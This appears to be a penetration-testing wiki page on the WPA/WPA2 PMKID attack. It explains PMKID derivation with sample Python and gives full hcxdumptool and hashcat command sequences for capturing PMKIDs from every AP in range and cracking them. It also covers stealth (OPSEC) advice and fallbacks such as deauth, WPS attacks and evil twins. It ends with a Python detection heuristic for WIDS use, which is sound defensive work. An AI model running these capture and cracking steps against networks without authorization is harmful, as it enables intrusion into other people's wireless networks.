# PMKID Attack

## Overview
The PMKID (Pairwise Master Key Identifier) attack, discovered by Jens "atom" Steube in 2018, allows offline WPA/WPA2-PSK cracking without capturing a 4-way handshake and without any connected clients. The PMKID is sent by the AP in the first frame of the 4-way handshake (EAPOL frame 1/4) and can be requested by simply associating with the AP. This eliminates the need for deauthentication frames, making the attack significantly stealthier.
Key advantage: No connected clients needed. No deauthentication needed. No active disruption of the network.
## How PMKID Works

The PMKID is derived as:

```
PMKID = HMAC-SHA1(PMK, "PMK Name" || AP_MAC || Client_MAC)
PMK   = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096)
```

Since the PMKID is a keyed hash under the PMK, and the PMK is derived from nothing but the passphrase and the SSID, a captured PMKID can be used for offline dictionary attacks — just like a 4-way handshake, but without requiring any client traffic.
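The two formulas above, carried through in code. This is an added example written for this page, not code from hashcat or hcxtools; the SSID, passphrase and MAC addresses are constructed sample values, and the function names are this example's own. One detail the formula leaves implicit is that the standard keeps only the first 128 bits of the HMAC-SHA1 output, which is why a PMKID is 16 bytes (32 hex characters) in a 22000-format hash line.

```python
import hashlib
import hmac

# Constructed sample values for the demonstration; they do not belong to any
# real network (assumed for this example only).
SAMPLE_SSID = "ExampleNet"
SAMPLE_PASSPHRASE = "correct horse battery staple"
SAMPLE_AP_MAC = "00:11:22:33:44:55"      # AA: authenticator (AP) address
SAMPLE_CLIENT_MAC = "66:77:88:99:aa:bb"  # SPA: supplicant (client) address


def mac_to_bytes(mac: str) -> bytes:
    """Turn 'aa:bb:cc:dd:ee:ff' (or dash-separated) into its 6 raw bytes."""
    raw = bytes.fromhex(mac.replace(":", "").replace("-", ""))
    if len(raw) != 6:
        raise ValueError(f"not a 48-bit MAC address: {mac!r}")
    return raw


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations), 256-bit output.

    The SSID is the salt, so the same passphrase yields a different PMK on
    every network with a different name. This step is the only expensive part
    of the computation, and it depends on neither MAC address.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, dklen=32)


def derive_pmkid(pmk: bytes, ap_mac: str, client_mac: str) -> bytes:
    """PMKID = HMAC-SHA1(PMK, "PMK Name" || AA || SPA), truncated to 128 bits."""
    message = b"PMK Name" + mac_to_bytes(ap_mac) + mac_to_bytes(client_mac)
    return hmac.new(pmk, message, hashlib.sha1).digest()[:16]


def pmkid_matches(passphrase: str, ssid: str, ap_mac: str, client_mac: str,
                  observed_pmkid: bytes) -> bool:
    """Check whether a candidate passphrase reproduces an observed PMKID.

    This is the entire offline check: no nonces, no client traffic, just the
    PMK derivation plus one HMAC, compared in constant time.
    """
    pmk = derive_pmk(passphrase, ssid)
    candidate = derive_pmkid(pmk, ap_mac, client_mac)
    return hmac.compare_digest(candidate, observed_pmkid)


if __name__ == "__main__":
    pmk = derive_pmk(SAMPLE_PASSPHRASE, SAMPLE_SSID)
    pmkid = derive_pmkid(pmk, SAMPLE_AP_MAC, SAMPLE_CLIENT_MAC)
    print("PMK   :", pmk.hex())
    print("PMKID :", pmkid.hex())
    print("correct passphrase matches:",
          pmkid_matches(SAMPLE_PASSPHRASE, SAMPLE_SSID, SAMPLE_AP_MAC,
                        SAMPLE_CLIENT_MAC, pmkid))
    print("wrong passphrase matches:",
          pmkid_matches("hunter2", SAMPLE_SSID, SAMPLE_AP_MAC,
                        SAMPLE_CLIENT_MAC, pmkid))
```

Two defensive observations fall straight out of the code: the cost an attacker pays per guess is the PBKDF2 call, which is fixed at 4096 iterations by the standard, so passphrase length and randomness are the only tunable defence; and because the SSID is the salt, a default or widely shared SSID lets one PMK computation be reused against every network with that name.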
## PMKID vs 4-Way Handshake
| Aspect | 4-Way Handshake | PMKID Attack |
|---|---|---|
| Client required | Yes (or deauth to force reconnection) | No |
| Deauth needed | Usually yes | No |
| Stealth | Low (deauth frames logged) | High (no disruption) |
| Capture time | Variable (wait for client) | Seconds (associate + receive) |
| AP support | All WPA/WPA2 | Most modern APs (~60%+) |
| Hashcat mode | 22000 | 22000 (same format) |
## Attack Workflow

### Step 1: Adapter Setup

```bash
# Kill interfering processes
sudo airmon-ng check kill

# Start monitor mode
sudo airmon-ng start wlan0

# Verify adapter is in monitor mode
iw dev wlan0mon info
```
### Step 2: PMKID Capture with hcxdumptool

```bash
# Basic PMKID capture (target all APs)
sudo hcxdumptool -i wlan0mon -o capture.pcapng --active_bids=1

# Targeted capture (specific BSSID)
sudo hcxdumptool -i wlan0mon -o capture.pcapng \
    --active_bids=1 \
    --rds=1 \
    --rcv_client=1 \
    --rcv_ap=1 \
    --filterlist_ap=ap_filter.txt \
    --filterlist_client=client_filter.txt

# Long-duration capture (for difficult targets)
sudo hcxdumptool -i wlan0mon -o capture.pcapng \
    --active_bids=1 \
    --stay_time=30

# The --active_bids=1 flag sends association requests to trigger PMKID
# The --rds=1 flag enables request-to-send frames for interaction
# --rcv_client and --rcv_ap enable client and AP interaction
```
### Step 3: Convert Capture to Hashcat Format

```bash
# Convert .pcapng to hashcat 22000 format
hcxpcapngtool -o hash.hc22000 capture.pcapng

# The tool will report:
#   EAPOL messages: N
#   PMKID: M
# If PMKID count is 0, the AP doesn't send PMKID (see Troubleshooting)

# View summary of captured hashes
hcxpcapngtool -o hash.hc22000 capture.pcapng --info=all
```
### Step 4: Dictionary Attack with Hashcat

```bash
# Basic dictionary attack
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt

# Rule-based mutation
hashcat -m 22000 hash.hc22000 wordlist.txt \
    -r /usr/share/hashcat/rules/best64.rule

# Combinator attack
hashcat -m 22000 hash.hc22000 -a 1 wordlist1.txt wordlist2.txt

# Mask attack (pattern-based)
hashcat -m 22000 hash.hc22000 -a 3 '?u?l?l?l?d?d?d?d?s'

# Session management (long-running)
hashcat -m 22000 hash.hc22000 rockyou.txt --session pmkid-crack
hashcat --session pmkid-crack --restore   # Resume

# Show cracked results
hashcat -m 22000 hash.hc22000 --show
```
## Advanced Techniques

### Targeting Multiple APs

hcxdumptool captures PMKIDs from all nearby APs in a single session. This is a major advantage over handshake capture, which targets one AP at a time.

```bash
# Capture PMKIDs from all APs in range (5-minute sweep)
sudo hcxdumptool -i wlan0mon -o sweep.pcapng --active_bids=1 -t 300

# Convert and extract all hashes
hcxpcapngtool -o sweep.hc22000 sweep.pcapng

# Crack all hashes simultaneously
hashcat -m 22000 sweep.hc22000 rockyou.txt
```
### PMKID + Handshake Combined

hcxdumptool can capture both PMKIDs and handshakes in the same session, maximizing the chance of cracking.

```bash
# Combined PMKID + handshake + EAP capture
sudo hcxdumptool -i wlan0mon -o combined.pcapng \
    --active_bids=1 \
    --rds=1 \
    --rcv_client=1 \
    --rcv_ap=1

# Convert (will extract both PMKIDs and handshakes)
hcxpcapngtool -o combined.hc22000 combined.pcapng

# Crack either type
hashcat -m 22000 combined.hc22000 rockyou.txt
```
### Pre-Computed PMK Attack

If the SSID is known, pre-compute PMKs for common passwords and compare against the PMKID directly. Because the expensive PBKDF2 step depends only on the passphrase and the SSID, a PMK list built once for a common SSID can be reused against every AP that broadcasts that name, which is faster than brute-forcing each capture from scratch.

```bash
# Generate PMK list for a known SSID
hashcat -m 22000 hash.hc22000 --session=pmk-gen wordlist.txt

# Or use hcxeiutool for PMK-based attacks
hcxpcapngtool -o hash.hc22000 capture.pcapng

# Hashcat will automatically handle PMKID-to-PMK comparison
```
## Troubleshooting
| Problem | Cause | Solution |
|---|---|---|
| "0 PMKIDs extracted" | AP doesn't include a PMKID in EAPOL frame 1/4 | Try handshake capture instead |
| PMKID captured but won't crack | Weak wordlist | Use larger wordlist + rules |
| hcxdumptool fails to associate | AP uses 802.11w (MFP) mandatory | Some MFP APs reject unauthenticated association |
| Adapter not supported | Adapter doesn't support required ioctls | Use a modern adapter (Alfa AWUS036ACH, etc.) |
| "hcxdumptool: interface does not support required ioctl" | Driver issue | Install updated wireless drivers, or try a different adapter |
| Capture shows "EAPOL" but no "PMKID" | AP sends PMKID only in certain frames | Increase capture duration, or use --stay_time=60 |
### APs That Don't Send PMKID
Not all APs send PMKID. Approximately 40% of APs don't include it in their EAPOL frame 1/4. For these:
- Fall back to handshake capture — use airodump-ng + deauth
- Try hcxdumptool with longer duration — some APs send PMKID intermittently
- Check for WPS — if WPS is enabled, use reaver/bully as an alternative
- Use an evil twin — force clients to authenticate to your AP
## OPSEC Considerations

- PMKID attacks are significantly stealthier than handshake capture because:
  - No deauthentication frames are transmitted
  - No legitimate client traffic is disrupted
  - Only a single association request is sent per AP
- However, the association request is still visible to WIDS/WIPS
- hcxdumptool's `--active_bids=1` flag sends association requests, which creates a brief client entry in the AP's station table
- For maximum stealth, use passive-only capture with hcxdumptool (omit `--active_bids=1`), but this requires waiting for legitimate client handshakes
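The two observable traces listed above (an association request and a short-lived station-table entry) are what a WIDS/WIPS has to work with, and they have a distinctive shape: the collector associates, receives EAPOL frame 1/4, and never sends frame 2/4, because answering 2/4 requires the PMK it does not have. It then typically repeats this against several BSSIDs in quick succession. The detection logic below is an added example for this page, not part of hcxdumptool or any WIDS product; the event format ("seconds, event, sta=, bssid=") is a constructed one chosen for the example, and real controller or sensor exports will need their own parser. Station, BSSID and timing values are constructed.

```python
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample export in an assumed "<seconds> <event> sta=<mac> bssid=<mac>"
# format (an assumption for this example; real WIDS/controller logs differ).
# 66:77:88:99:aa:bb completes a normal handshake. de:ad:be:ef:00:01 associates
# with three BSSIDs, receives EAPOL 1/4 from each and never answers with 2/4.
# c0:ff:ee:00:00:01 is mid-handshake when the window closes.
SAMPLE_EVENTS = """\
0.00 assoc_req sta=66:77:88:99:aa:bb bssid=00:11:22:33:44:55
0.05 eapol_m1  sta=66:77:88:99:aa:bb bssid=00:11:22:33:44:55
0.12 eapol_m2  sta=66:77:88:99:aa:bb bssid=00:11:22:33:44:55
1.00 assoc_req sta=de:ad:be:ef:00:01 bssid=00:11:22:33:44:55
1.04 eapol_m1  sta=de:ad:be:ef:00:01 bssid=00:11:22:33:44:55
3.10 assoc_req sta=de:ad:be:ef:00:01 bssid=00:11:22:33:44:66
3.15 eapol_m1  sta=de:ad:be:ef:00:01 bssid=00:11:22:33:44:66
5.20 assoc_req sta=de:ad:be:ef:00:01 bssid=00:11:22:33:44:77
5.24 eapol_m1  sta=de:ad:be:ef:00:01 bssid=00:11:22:33:44:77
9.00 assoc_req sta=c0:ff:ee:00:00:01 bssid=00:11:22:33:44:77
9.03 eapol_m1  sta=c0:ff:ee:00:00:01 bssid=00:11:22:33:44:77
"""


@dataclass(frozen=True)
class Event:
    ts: float
    kind: str    # assoc_req | eapol_m1 | eapol_m2
    sta: str
    bssid: str


def parse_events(text: str) -> list:
    """Parse the constructed export format into Event records (MACs lower-cased)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, kind, sta_kv, bssid_kv = line.split()
        events.append(Event(float(ts), kind,
                            sta_kv.split("=", 1)[1].lower(),
                            bssid_kv.split("=", 1)[1].lower()))
    return events


def half_open_handshakes(events, now: float, grace: float = 2.0) -> dict:
    """Map each station to the BSSIDs from which it received EAPOL 1/4 but never
    sent 2/4. A pair younger than `grace` seconds is ignored, since that
    handshake may simply still be in progress."""
    first_m1 = {}
    answered = set()
    for e in events:
        key = (e.sta, e.bssid)
        if e.kind == "eapol_m1":
            first_m1.setdefault(key, e.ts)
        elif e.kind == "eapol_m2":
            answered.add(key)
    result = defaultdict(set)
    for (sta, bssid), ts in first_m1.items():
        if (sta, bssid) in answered or now - ts < grace:
            continue
        result[sta].add(bssid)
    return dict(result)


def suspected_pmkid_collectors(events, now: float, min_aps: int = 2,
                               grace: float = 2.0) -> list:
    """Stations with half-open handshakes against at least `min_aps` distinct APs.
    A single half-open handshake is common (driver hiccups, roaming, weak signal),
    so the multi-AP threshold is what keeps the false-positive rate down."""
    half_open = half_open_handshakes(events, now, grace)
    hits = [(sta, sorted(bssids)) for sta, bssids in half_open.items()
            if len(bssids) >= min_aps]
    return sorted(hits, key=lambda h: (-len(h[1]), h[0]))


if __name__ == "__main__":
    evts = parse_events(SAMPLE_EVENTS)
    for sta, bssids in suspected_pmkid_collectors(evts, now=20.0):
        print(f"{sta}: EAPOL 1/4 received, 2/4 never sent, from {len(bssids)} APs: {', '.join(bssids)}")
```

Tune `grace` to the EAPOL retransmit timeout of the APs you monitor and `min_aps` to how dense the deployment is; on a site with many BSSIDs a passive-only collector (the last bullet above) produces none of these events at all, which is why this heuristic complements, rather than replaces, baselining of which client MACs are expected on the air.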
## Cross-References
- WPA/WPA2 Cracking — Traditional handshake capture (fallback when PMKID isn't available)
- WPA3 Attacks — WPA3-SAE attacks (PMKID is not exposed in SAE-only mode)
- Deauthentication Attacks — Required for handshake capture (not needed for PMKID)
- Evil Twin & Rogue AP — Alternative when PMKID and handshake both fail
## Tool References
| Tool | Purpose | Link |
|---|---|---|
| hcxdumptool | PMKID and handshake capture | https://github.com/ZerBea/hcxtools |
| hcxpcapngtool | Convert captures to hashcat format | https://github.com/ZerBea/hcxtools |
| hashcat | Offline hash cracking | https://hashcat.net/hashcat/ |
| bettercap | WiFi reconnaissance and PMKID | https://www.bettercap.org/ |
## Source Machines
- No specific HTB machines; PMKID attacks require physical wireless assessment